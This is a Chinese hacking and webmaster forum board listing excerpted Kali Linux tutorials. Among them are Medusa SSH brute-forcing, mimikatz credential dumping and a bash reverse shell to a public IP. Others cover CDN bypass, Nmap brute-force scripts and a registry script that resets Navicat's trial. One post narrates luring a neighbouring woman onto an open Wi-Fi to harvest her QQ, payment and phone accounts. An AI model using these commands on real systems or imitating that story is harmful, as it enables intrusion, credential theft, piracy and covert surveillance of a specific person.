建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
363个主题在此版面
-
你是否在尋找一款穩定、高效的IP代理工具,助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理? Smart Proxy 為你提供大量高匿IP資源,全球覆蓋,安全穩定,滿足各類業務需求! 為什麼選擇Smart proxies? 海量IP池-覆蓋全球200+國家地區,輕鬆切換不同地區IP; 高匿穩定-HTTP、HTTPS、SOCKS5協定支持,高匿名度,安全穩定; 高速連線-優質線路,低延遲,確保流暢體驗; 性價比高-彈性套餐,隨選購買,低成本高收益; 便利操作-API呼叫支持,一鍵切換IP,適用於各種應用場景。 適用場景: 爬蟲資料收集,突破反爬限制 跨境電商,防關聯操作 遊戲加速,暢玩全球服 社媒行銷,多帳號管理 限時優惠活動 現在註冊 Smart proxies,新用戶可享專屬折扣,更有免費流量等你體驗! 官網位址: SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位;聯絡专属客戶經理: 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
-
- 1 篇回复
- 29 次查看
-
-
-
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。语法mudusa -h Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]命令详解: -h: 目的主机IP -H: 文件(有多个目标时,可以将IP放到一个文件中) -u: 单个用户名 -U: 用户名字典文件 -p :单个密码 -P: 密码文件 -M: 模块 指定用户名的密码破解如果用户名和协议都是已知的,我们可以使用medusa来破解密码。 命令如下: medusa -h 192.168.50.1 -u priess -P /root/zi.txt -M ssh 账号和密码破解用户名和密码都未知,命令如下 medusa -h 192.168.50.1 -U user.txt -P pass.txt -M s…
-
- 0 篇回复
- 18 次查看
-
-
PyCharm是一个集成的Python开发环境工具。能够调试代码、生成和运行代码。Pycharm是python开发人员不可缺少的神器。环境要求最少 2 GB 内存,建议 8 GB 内存1024x768 最低屏幕分辨率Python 2.7,或 Python 3.5 或更高版本本文将在Kali 2022中进行安装。 下载安装包首先我们到PyCharm的官网下载安装包,https://www.jetbrains.com/pycharm/download/#section=windows 目前,Pycharm提供了三种不同操作系统的版本,这里我们选择KALI作为操作系统,所以点击Linux 选择社区版本,Download 等待下载完成后,我们将其复制到kali中去。 执行下面命令,对文件进行解压。 tar -zxvf pycharm-community-2022.1.3.tar.gz 运行cd bin #进入bin目录 ./同意协议 send anonymous ststistice 完美运行
-
- 0 篇回复
- 18 次查看
-
-
通过本文,我们一起来看看。如何黑掉别人的桌面壁纸吧。 实验环境kali LinuxWindows小米手机(Android12)模块介绍set_wallpaper这个模块非常简单,因为它所做的就是在指定的会话上设置桌面壁纸背景。当我们运行模块时,将攻击者电脑上的图片上传到受害者系统,然后设置为受害者的壁纸。 更改Windows壁纸在Kali中终端并键入 msfconsole 以加载 Metasploit 框架。在目标主机获得shell后,将当前的session会话信息放到后台。 然后执行下面命令 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root//1.jpg exploit这样便完成了对windows桌面背景的修改。 更改安卓上的壁纸首先,在Android系统上获取一个meterpreter会话。 还是和前面一样,利用background命令,将当前会话放置到后台运行。然后使用set_wallpaper模块。 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root/Desktop/1.jpeg exploit效果 视频演示
-
- 0 篇回复
- 24 次查看
-
-
Crunch在肾透测试和各种暴力破解中,我们需要各种各样的密码字典。github上面的字典五花八门,但是没有一款适合自己。那么,如何制作自己的字典文件呢?Crunch是C语言开发的一种工具,可以创建自定义可修改的单词列表。在本文中,我们将详细讲解Crunch的使用。安装Crunch默认安装在Kali Linux上,如果其他系统也可以用apt命令安装。 apt-get install crunch运行crunch生成字典,要求我们输入要生成的单词的最小和最大值以及输出文件,它会自动将小写字母表作为字符集并生成字典。 示例1生成最短1个长度,最长为3个长度。 crunch 1 3 -o kali.txt 自定义字母和数字字符当然,我们可以做字母和数字两者的结合。如下: crunch 5 7 pass123 -o kali.txt代码说明: 以p a s s 1 2 3这七个字母和数字进行排列组合,生成最短5位,最长7位的字典。 创建带有符号的字典@ :将插入小写字符 ,:将插入大写字符 % :将插入数字 ^ :将插入符号 固定单词 + 3 个数字假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入随机数字组合,则可以通过指定模式来完成。 crunch 6 6 -t bbs%%% -o num.txt 固定单词 + 3 个大写字母假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入大写字母的随机组合,则可以通过以下方式完成 crunch 6 6 -t bbs,,, -o kali.txt 固定单…
-
- 0 篇回复
- 29 次查看
-
-
关于mimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。项目地址https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz实验环境Windows 7Kali Linux使用运行mimikatz.exe 需要用管理员权限运行 分别输入下面命令 privilege::debug sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了 怎么样,很简单吧! 当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码 但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 好吧,既然提高了kiwi我们来看看kiwi怎么用 关于kiwimeterpreter > help kiwi #查看帮助 Kiwi Commands ====…
-
- 0 篇回复
- 24 次查看
-
-
如果你是一个个体经营户,年收入几百W的哪种。当有人来到店里,是不是经常有客人问你Wi-Fi密码是多少?基本上来一个问一遍。而你也会说“用万能钥匙去连,或密码在墙上贴着自己去看”。体验极为不爽!为了提升效率想着让他们自助连接Wi-Fi,TX之前推出了WiFi连一连,哪么还有没有比较简单的方法呢?存在问题分析避免客人一进来问Wi-Fi密码的尴尬。对于老人等特殊人群不认识字母。密码贴到墙上,手动输入太麻烦。微信WiFi连一连对于微信WiFi连一连,相对来说做的比较商业化。门槛比较搞,需要申请微信公众号并且要认证,同时还需要路由器的支持。所有普通的小店是没有必要的。 想来想去还是用中国人民习以为常的二维码来解决这个吧。 优缺点分析首先微信不支持扫码连接Wi-Fi,这个是最大的弊病,但是好在支付宝支持这个功能。那我们就可以让用户使用支付宝来扫码。 同时现在大多数手机都可以利用手机本身的扫一扫来连接WIFI. 制作也跟简单,我们只需要制作一个含有WiFi信息的二维码即可。 WIFI:T:WPA;S:名称;P:密码;H:false;例如名称为逍遥子大表哥-5G密码bbskali.cn则为 WIFI:T:WPA;S:逍遥子大表哥-5G;P:bbskali.cn;H:false;复制代码,打开草料二维码生成器,将文本生成二维码。 扫码效果 美化我们可以去zfb下载店铺的物料,然后将含有WiFi信息的二维码进行简单的合成即可。 最终效果
-
- 0 篇回复
- 27 次查看
-
-
在工作和生活中为了安全考虑,通常会对一些重要文件进行加密备份或加密保存。在Linux中如何做到呢?本文将为你介绍在Linux中常见的加密文件的方法。 01利用 vim/vi 加密优点:加密后,如果不知道密码,就看不到明文,包括root用户也看不了; 缺点:很明显让别人知道加密了,容易让别人把加密的文件破坏掉,包括内容破坏和删除; Vim加密示例首先用vim新建文件 vim 大表哥.txt按i进到编辑模式,输入完内容后按ESC,然后输入:X(注意是大写的X),回车; 这时系统提示让你输入密码,2次 :wq保存后退出,现在这个文件已经加密了; 用cat或more查看文件内容,显示为乱码;用 vim/vi 重新编辑这个文件,会提示输入密码,如果输入的密码不正确,同样会显示为乱码! 同样,当我们用vim编辑文档时,会提示输入密码。输入正确的密码后,才能进行编辑文档。 那么,如何去掉对文件的加密呢,我们只需要输入:set key=回车,保存文件即可! 02利用gzexe加密gzexe是系统自带的加密程序,它不但加密,同时压缩文件。 优点:加密简单,方便。 缺点:不能自己设置密码,容易破解。 加密/解密gzexe 22.txt #加密 gzexe -d 22.txt #解密 用tar命令 对文件加密压缩和解压这个就很简单了,类似于Windows下的给压缩包添加密码一样。 加密tar -czf - filename | openssl des3 -salt -k passwd | dd of=filename.des3命令说明: 在 tar -cz…
-
- 0 篇回复
- 25 次查看
-
-
说实在的Pyhon在数据处理方面确实很牛。尤其是大数据的今天,我们和形形色色的数据形影不离。本文给大家介绍下利用百度OCR进行文字识别。实验环境Python (3.9.12)Kali Linux百度OCR 申请百度OCR访问百度智能云,开通API 网址:https://cloud.baidu.com/campaign/OCR202203/index.html 可以使用百度账号登录,使用百度登录的好处是,你可以把百度的实名认证直接迁移过来,就不需要再等几天人工审核了。 你可以选择免费试用,或者1块钱买1万次,我觉得没什么区别,都是够用的。 领取免费额度的时候要勾选接口类型,要不然是一片空白。 新建应用,获取token 在控制台-文字识别-概览中点击创建应用 应用归属选择个人,应用名称和概述就随便填 创建完成之后,进入应用列表,可以看到API Key和Secret Key,记下来。 文字识别根据官方示例,写了Python的简单列子。参考如下: from aip import AipOcr APP_ID = 'xxxxxx'#你的APP_ID API_KEY = 'xxxxxxxxx'#你的API_KEY SECRET_KEY = 'xxxxxxxx'#你的SECRET_KEY client = AipOcr(APP_ID, API_KEY, SECRET_KEY) def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() imag…
-
- 0 篇回复
- 20 次查看
-
-
现在无论是那种自媒体,都有点赞的功能。而一篇文章的赞越多相应的会得到相关的流量和推广。你知道关于赞是如何实现的吗? 什么是COOKIECookie实际上是一小段的文本信息(key-value格式)。客户端向服务器发起请求,如果服务器需要记录该用户状态,就使用response向客户端浏览器颁发一个Cookie。客户端浏览器会把Cookie保存起来。当浏览器再请求该网站时,浏览器把请求的网址连同该Cookie一同提交给服务器。服务器检查该Cookie,以此来辨认用户状态。 举个例子,加入你的电话丢了。当你买个新手机后要去办卡。这是我们只拿着sfz去补办就行了。因为之前你办卡时,系统中已存放了你的相关的信息。无需录入新的信息! 基于Cookie的点赞这里我已我的博客为例,如文章《树莓派4B搭建自己的FM电台》当前的点赞数为2赞。当我点赞后无法连续点赞。 而后,清楚浏览器缓存后。在尝试点赞。 可以发现,又能点赞了。这是什么原因呢? 原来,当我们点击点赞按钮后,我们的浏览器会存在cookie数据。当我们再次点赞时,cookie数据已经存在了,故不能连续点赞。反之,当我们清除了浏览器存放的cookie数据,便可以再次点赞。那么?能不能不要每次都手动清除浏览器数据,而自动刷赞呢? 分析数据包我们在burp中抓包,看看数据的请求是怎样的。 点击点赞按钮,抓取数据包。 可以看到,我们的cookie是编码的。右键Send to decode对编码解码 原数据 Cookie: __51uvsct__JJhdkR8L54ZwvuFw=13; __51vck…
-
- 0 篇回复
- 19 次查看
-
-
Wireshark是世界上首要和广泛使用的网络协议分析工具。它允许您在微观层面上查看网络上发生的事情,并且是许多商业和非营利企业教育机构的研究标准。支持数百种协议,并不断添加更多协议。具有实时捕获和离线分析,多平台,支持图形界面和命令行等功能。以便我们进行快速、直观的分析数据。 启动Wireshark的启动很简单,我们可以在开始菜单中找到Wireshark的图标,或者在终端执行Wireshark命令即可。 进入到wireshark工具的首页界面,会让我们选择要监听的网卡。选择我们的监听的网卡。直接双击即可。 界面介绍wireshark大体可分为五个区域,分别如下所示。 快捷功能栏分别对应 序号说明功能1开始抓包启动工具 开始抓包2停止抓包停止工具抓包3重新开始抓包重新开始4抓包设置用来设置抓包参数5打开数据包文件打开离线or保存的数据包6保存数据包保存数据7关闭捕获文件关闭当前8重新加载重新加载9查找查找数据(最常用)10转到前一个分组分组数据跳转11转到下一个分组分组数据跳转12转到特定分组分组数据跳转13转到首个分组分组数据跳转14转到实时分组分组数据跳转15抓包时跟随最新分组实时到最新分组16对不同协议进行着色便于区分协议17放大主窗口文字放大文字18缩小主窗口文字缩小文字19重置主窗口文字重置窗口20调整分组列表适应内容同上数据列表栏 序号说明功能1Time表示捕获包的时间2source表示来源地址3Destination表示目的地址4Protocol表示协议名称5Length表示数据包的长度6Info表示数据包的信息牛刀小试…
-
- 0 篇回复
- 18 次查看
-
-
什么是CDN?为什么要绕过?CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。 因为站点加了CND,所以是没法获取真实的服务器IP信息。而CDN绕过的目标是获取目标的真实IP信息,从而方便渗透测试。 如何检验站点是否有CDN方式一:通过站长工具对站点多地ping http://ping.chinaz.com 如下,我们可以看到当前站点有多个独立的IP,即每个地区响应的IP不一样。 方式二:nslookup 执行命令 nslookup blog.bbskali.cn 如何绕过既然得知了目标套用了CND,那么如何绕过呢? 方法一:利用邮箱 很多网站都有密码找回密码功能,或者留言回复功能。如我们通过邮箱找回密码,会将验证码发送到我们的邮箱。因为邮件是在目标服务器发送的。故我们可以在邮件中获取目标的IP信息。 这里以QQ邮箱为例: 打开收到的邮件点击显示邮件原文即可。 方法二:查子域名 CDN并不便宜,目标网站可能只有主站(www.xxx.com)和流量较大的子站(hub.xxx.com)购买了CDN,可能有很多小站(mail.xxx.com)和前者分布在同一个机器或者C段网段内,这样我们可能猜解出网站的真实ip dnsmap bbskali.cn通过对子域名的收集,我们同样也可以…
-
- 0 篇回复
- 25 次查看
-
-
请注意,本文编写于 1055 天前,最后修改于 1055 天前,其中某些信息可能已经过时。 在日常工作中,我们需要得到目标系统的shell。在局域网相对简单,而不在同一局域网或者是异地网络。那么如何让目标直接互通执行相关shell命令呢?通过本文我们一起来看看Linux如何反弹shell。 实验环境kali Linux (内外:192.168.5.139) Centos8 (腾讯云:123.6.44.67) 姿势一 bash反弹首先,使用nc在外网主机上监听端口: nc -lvp 9090注意:一定是外网设置执行,因为两个设备不在同一网段。外网不能直达内网,但内网可以到达外网。 然后,在kali/内网执行下面命令 bash -i >& /dev/tcp/123.6.44.67/9090 0>&1命令解读 inux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>> 还有就是>&这个符号的含义,最好的理解是这样的: 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。 当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符 理解了上面这些知识,下面来解释一下这一条反弹shell的命令, bash -i代表在本地打开一个交互式bash, /d…
-
- 0 篇回复
- 23 次查看
-
-
在我们看来,Linux就是全命令行。需要记录很多的命令来实现某个功能。正是这样,也让学习Linux有了一定的门槛。但是你知道吗?Linux中也有很多的有趣命令,当然所有Linux发行版都可以安装运行这些命令!一起来玩耍吧! sl 命令你会看到一辆火车从屏幕右边开往左边。。。。。。 安装 sudo apt-get install sl 运行 sl 命令有 -alFe几个选项, -a An accident seems to happen. You’ll feel pity for people who cry for help. -l shows little one. -F It flies. -e Allow interrupt by Ctrl+C.可以给别人来个恶作剧,他一敲ls,不知道的肯定很有效果 alias ls=slfortune 命令输出一句话,有笑话,名言什么的 (还有唐诗宋词sudo apt-get install fortune-zh) 安装 sudo apt-get install fortune运行 fortune cowsay 命令用ASCII字符打印牛,羊等动物,还有个cowthink,这个是奶牛想,那个是奶牛说,哈哈,差不多 安装 sudo apt-get install cowsay运行 cowsay "大表哥,牛逼666" cowsay -l查看其它动物的名字,然后-f跟上动物名,如 cowsay -f tux "坑爹啊" 还可以让cowsay说出fortune的内容,就像这样: fortune | co…
-
- 0 篇回复
- 19 次查看
-
-
exe2hexbat是一个 Python 脚本,用于将 Windows PE 可执行文件转换为批处理文件,反之亦然。概述exe2hex 将可执行二进制文件编码为 ASCII 文本格式。然后,将结果传输到目标计算机(回显 ASCII 文件比回显二进制数据容易得多)。执行exe2hex的输出文件后,使用或PowerShell(默认情况下在Windows上预安装)还原原始程序。可以使用exe2hex中的内置 Telnet 或 WinEXE 选项自动将文件传输到目标计算机。 Binary EXE -> ASCII Text -> *Transfer* -> Binary EXE 快速开始-x 使用文件或 STDIN ( /path/to/binary-program.exe-s) -b 输出到 BATch /或 PoSH (-b file.bat-p powershell.cmd) 用法示例创建 BATch & PowerShell 文件: 这里我随便写了一个exe程序 exe2hex -x chao.exe 可以看到,exe2hex将exe文件转变成了cmd和bat文件。 在创建 BATch 文件之前压缩文件 exe2hex -x chao.exe -b nc.txt -cc [*] exe2hex v1.5.1 [i] Attempting to clone and compress [i] Creating temporary file /tmp/tmp509bq1bl [+] Compression (str…
-
- 0 篇回复
- 20 次查看
-
-
关于Nmap的教程,在前面的文章中写到过很多次了。通常情况下,我们是直接用Nmap扫描端口,然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐,那么我们就要有必要认识一下Nmap的扩展脚本了! nmap --scriptNmap的脚本位置:/usr/share/nmap/scripts/ 查看脚本的数量 ls /usr/share/nmap/scripts/ | wc -l可以看到,目前有605个,当然这些插件我们可以自己编写,也可以去下载。总之很方便的。 nmap脚本主要分为以下几类,在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描: 脚本名说明auth绕开鉴权 检测是否存在弱口令broadcast局域网内探查更多服务开启状况brute暴力破解方式,针对常见的应用如http/snmp等default使用-sC或-A选项扫描时候默认的脚本dos用于进行拒绝服务攻击exploit利用已知的漏洞vuln负责检查目标机是否有常见的漏洞常用示例检查弱口令nmap --script=auth 192.168.123.1 暴力破解可对mysql http smtp等常见协议进行暴力破解。 nmap --script=brute 192.168.123.1如下,我们通过暴力破解,得到了telent的登录密码为admin 尝试登录 默认脚本扫描默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击。 nmap --script=default 192.168.123.1 或者 n…
-
- 0 篇回复
- 23 次查看
-
-
Arping用于发现计算机网络上的存活主机。通过对网段内的IP进行扫描,可以获取有关该地址的相关信息和存活状态。Arping 使用地址解析协议 (ARP) 在第 2 层(或 OSI 模型的链路层)运行工作,以探测主机。由于 ARP 不可路由,因此这仅适用于本地网络。 使用帮助arping -h ARPing 2.22, by Thomas Habets <[email protected]> usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w <sec> ] [ -W <sec> ] [ -S <host/ip> ] [ -T <host/ip ] [ -s <MAC> ] [ -t <MAC> ] [ -c <count> ] [ -C <count> ] [ -i <interface> ] [ -m <type> ] [ -g <group> ] [ -V <vlan> ] [ -Q <priority> ] <host/ip/MAC | -B> For complete usage info, use --help or check the manpage.参数释义-A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。 …
-
- 0 篇回复
- 18 次查看
-
-
chntpw是一个Kali Linux工具,可用于编辑Windows注册表,重置用户密码,将用户提升为管理员,以及其他几个有用的选项。使当您不知道Windows密码是什么时,可以利用chntpw对其修改。用户数据库文件中的某些信息和更改用户密码,通常位于 Windows 文件系统上的 \WINDOWS\system32\config\SAM。 正在播放:抱歉 Louis C.K.: Sorry (2021) 剧集列表 抱歉 Louis C.K.: Sorry (2021) 一根弦 使用命令chntpw -h chntpw: change password of a user in a Windows SAM file, or invoke registry editor. Should handle both 32 and 64 bit windows and all version from NT3.x to Win8.1 chntpw [OPTIONS] <samfile> [systemfile] [securityfile] [otherreghive] [...] -h This message -u <user> Username or RID …
-
- 0 篇回复
- 24 次查看
-
-
本文我们来看看基于树莓派4B的Openwrt,Openwrt是著名的路由器管理系统,因其开源,第三方可编译等优点被许多厂商使用。 恰好手头有个树莓派4B,刷入Openwrt做软路由。同时给其尝试加入各种插件。 配件准备树莓派4B开发板32G内存卡一根网线 选择固件这里我用的是Lean的树莓派openwrt固件。 作者项目地址:https://github.com/coolsnowwolf/openwrt 刷入固件打开工具win32,如下选择固件和磁盘位置,点击写入 写入成功后,将卡插入树莓派。启动树莓派。 登录后台将树莓派的的网口用网线连接至自己的电脑,然后在浏览器内输入192.168.1.1,如果连接没问题的话会直接跳转到openwrt后台界面。 默认用户名:root 默认登录密码:password 添加接口添加一个wan端口,协议为DHCP客户端,物理设置中勾选以太网适配器eth0 openwrt的优势openwrt和其他固件不同在于,可以安装很多插件。如广告屏蔽、云盘下载加速等。 网络储存 当然,我们也可以在路由器上大家Nginx和PHP环境。也就是说我们可以将路由器搭建成为一个小型的服务器。 配置ssh自己的东西,凭什么不能登录ssh。很多路由器固件是不能ssh登录的,而openwrt很简单。 配置ssh 登录ssh 搭建博客修改nginx配置文件 user root root; worker_processes 1; pid /var/run/nginx_kodexplorer.pid; event…
-
- 0 篇回复
- 15 次查看
-
-
我们在网络上下载文件,有时常常会看到文件的作者会附加程序的md5值。其目的是让用户对下载的文件进行md5值对比。若你下载的文件的MD5值与原作者提供的不符,则说明文件被他人修改过。如果是程序,则有可能被他人加入了恶意后门。 计算机为任意数量的文件使用多个哈希或消息摘要。同时可以选择以递归方式挖掘目录结构。默认情况下,程序计算 MD5 和 SHA-256 哈希,等效于 -c md5,sha256。它还可以使用已知哈希列表来审核一组文件。错误将报告为标准错误。如果未指定任何文件,则从标准输入读取。 使用hashdeep 文件名 将文件修改后,再看md5值 可以发现,由b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239改变成为了02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 其他参数-c :模式。使用指定的算法计算文件的哈希。支持 md5、sha1、sha256、tiger 和 whirlpool。 -r :启用递归模式。遍历所有子目录。请注意,递归模式不能用于检查给定文件扩展名的所有文件。例如,调用 hashdeep -r *.txt 将检查以.txt结尾的目录中的所有文件。 -v :启用详细模式。再次使用以使程序更详细。
-
- 0 篇回复
- 21 次查看
-
-
下载系统镜像根据自己的系统环境,下载合适的版本。 下载时,建议用迅雷下载。比较稳定点。 下载完成后,打开工具win32磁盘映像工具,其他工具也行。 静待片刻…… 提示写入成功。 将卡拔掉,插入树莓派。连接网线通电! 确定ip地址登录路由器查看树莓派的ip,或者利用nmap扫描即可。 nmap -sL 192.168.123.1/24登录Kali这里我们用xshell登录树莓派,默认账号和密码分别为kali kali 如下,成功登录kali 其他事项配置vnc因为自己家境贫寒,买不起屏幕。用vnc远程连接。 在终端输入tightvncserver配置vnc连接密码。 连接vnc主机名:ip:1 密码:刚才自己输入的密码 注意ip后面必须填写:1 启动命令为 vncserver :1 设置root密码随着2022的到来,kali初始的root账号以禁用。而是更新了新的策略。即用户为普通用户kali 执行下面命令,修改root密码。 sudo su passwd root这样便设置了root账号和密码 设置中文在命令行输入dpkg-reconfigure locales。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.UTF-8,确定后,将en_US.UTF-8选为默认。 安装中文字体 apt-get install xfonts-intl-chinese apt-get install ttf-wqy-microhei在终端执行 echo LANG="zh_CN.UTF-…
-
- 0 篇回复
- 20 次查看
-
-
Navicat Premium是一个很好的数据库管理工具。将此工具连接到一个数据库,在那里您可以看到各种数据库的详细信息。这包括报告错误,等等。当然,还可以通过他登录数据库,进行各种操作。Navicat Premium是一个多链接的数据库管理工具,允许您在一个程序中同时连接到MySQL, SQLite, Oracle和PostgreSQL数据库,使它更容易管理不同类型的数据库。版本Navicat Premium 16.0.10 下载官网下载地址:https://www.navicat.com.cn/products/navicat-premium Navicat Premium 16新增功能1、图表 Navicat 16提供了更多数据源和图表支持。我们非常注重提高可用性和可访问性,为你的工作提供至关重要的信息.。 2、数据生成 数据生成可帮助你创建大量测试数据。让你在相互关联的多个表中创建复杂的数据。 3、On-Prem Server现已添加到我们的 Navicat系列中。我们为你提供托管云环境的选项,在你所在的位置内部存储Navicat 对象。 4、连接配置文件 为外出用户配置多个连接配置文件,可根据使用的设备的当前位置切换连接设置。 5、生产力 Navicat 16具有众多功能和UI/UX改进,以满足你的数据库开发需求。为你提供构建、管理和维护数据库的新方法。 安装 破解Navicat 16.0.10目前尚未有注册机,但是我们可以利用清除注册表的方法。来延长试用期。当然你也可以下载16.0.x其他版本的破解版。 脚本如下: @ec…
-
- 0 篇回复
- 19 次查看
-
-
什么是MD5一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于加密数据。在生活中的各个领域都有所使用。如我们平时各大网站注册的账号和密码,其中密码就是通过MD5加密的方式储存在数据库中。反向行之,如果我知道了MD5值,那能否知道所对用的密码呢?答案是确定的,我们一起看看吧。 在kali中生成某组数值的md5值执行命令 echo bbskali | md5sum这样我们便生成了bbskali的md5值。 效果如下: 如上我们得到了对应的md5值为c4da3fa052d104d8fbb410ae8751466d 同样,怎么通过md5值获取到相应的密文呢? 办法比较多,我们可以通过一些在线的md5解密网站来完成,但本文将介绍一款由python写的小脚本,轻松解决上诉问题。 安装与使用git clone https://github.com/s0md3v/Hash-Buster/ cd Hash-Buster python3 hash.py -s md5值注意:python2 不兼容,请改用 python3 运行,当然你也可以直接编译安装make install详情可以看看作者的介绍。 优点优点: 自动哈希类型识别支持MD5、SHA1、SHA256、SHA384、SHA512可以从文件中提取和破解哈希可以递归地从目录中找到哈希值多线程 其他破解单个哈希python3 hash.py -s <hash>从目录中查找哈希只需指定一个目录,Hash Buster 就会遍历其中存在的所…
-
- 0 篇回复
- 27 次查看
-
-
残灯几盏,夜色浓浓。我走在城市不知名的小路上,抱怨着上班带给我的种种压抑。看看羞涩的钱包,看看迷茫的前路……我陷入了沉思。今天又是加班的一天,新项目要上线但BUG层出不穷,只能加班到这个点了。这时有老婆的估计都睡了吧。 来到自己租的公寓楼下,我租的小公寓是两层的小楼,楼下住着房东,楼上共两间房。之前一间是大人陪读的,孩子毕业后也搬走了。二层有个小院,这是我租这里的原因。夏日坐在小院,抬头仰望星空,甚是美哉! 刚上小楼,发现隔壁的灯亮着。这都这个点了,哪来的人呢?估计是新搬来的吧。也没在乎,累了一天直接睡了。 每天起床我是比较迟的,但是今天起床格外的早。因为我在梦中恰似听见了有女的说话。而且是那种很具有磁性的声音。对于我这种单身狗而言,可遇不可求!因我性格比较内向,也比较腼腆,至今也没女朋友。而我恰似看到了春天。 在上班的时候,碰到房东,顺便提到此事。从房东口中得知,原来是昨天刚搬来的,好像是在某行政单位上班。对我来说这是一个千载难逢的机会,而一个新的计划整天徘徊在我脑海中。 信息收集目标: 收集 QQ *宝 信 手*号 等相关信息。 抛砖引玉如何获取目标的以上信息呢?有的小伙伴说很简单吗?问问不就行了,可对于我们这种性格内向的人来说。这是一道无法跨越的坎。 那该如何做呢?如今虽是5G,但是昂贵的费用让打工人还是喜欢蹭WIFI。她刚搬来,第一件事就是看看有没有能用的WIFI。 如是我开启了路由器的访客网络,没有加密。目的是让其能快速上钩。但是有些因免费热点而有所顾虑。也可以设置为加密WiFi,然后通过WiFi万能钥匙分享密码。 乘间伺隙…
-
- 0 篇回复
- 20 次查看
-